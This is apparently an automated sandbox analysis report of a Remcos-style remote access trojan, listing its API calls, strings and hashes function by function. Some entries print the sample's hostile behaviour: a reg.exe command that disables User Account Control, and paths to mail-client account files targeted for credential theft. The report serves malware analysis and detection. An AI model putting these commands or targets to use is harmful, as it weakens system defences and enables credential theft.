                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                • API String ID: 4036392271-1520055953
                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                • GetLastError.KERNEL32 ref: 0041D611
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                • String ID: 0$MsgWindowClass
                                                                • API String ID: 2877667751-2410386613
                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                Strings
                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateProcess
                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                • API String ID: 2922976086-4183131282
                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Rmc-I89M3S, xrefs: 00407715
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-I89M3S
                                                                • API String ID: 0-769694051
                                                                • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                • String ID: KeepAlive | Disabled
                                                                • API String ID: 2993684571-305739064
                                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                • String ID: Alarm triggered
                                                                • API String ID: 614609389-2816303416
                                                                • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                Strings
                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                • API String ID: 3024135584-2418719853
                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                • _free.LIBCMT ref: 0044943D
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00449609
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                • String ID:
                                                                • API String ID: 1286116820-0
                                                                • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                  • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 2180151492-0
                                                                • Opcode ID: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                • Opcode Fuzzy Hash: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                • __freea.LIBCMT ref: 0045129D
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                • String ID:
                                                                • API String ID: 313313983-0
                                                                • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                • _free.LIBCMT ref: 100071B8
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                • String ID:
                                                                • API String ID: 336800556-0
                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
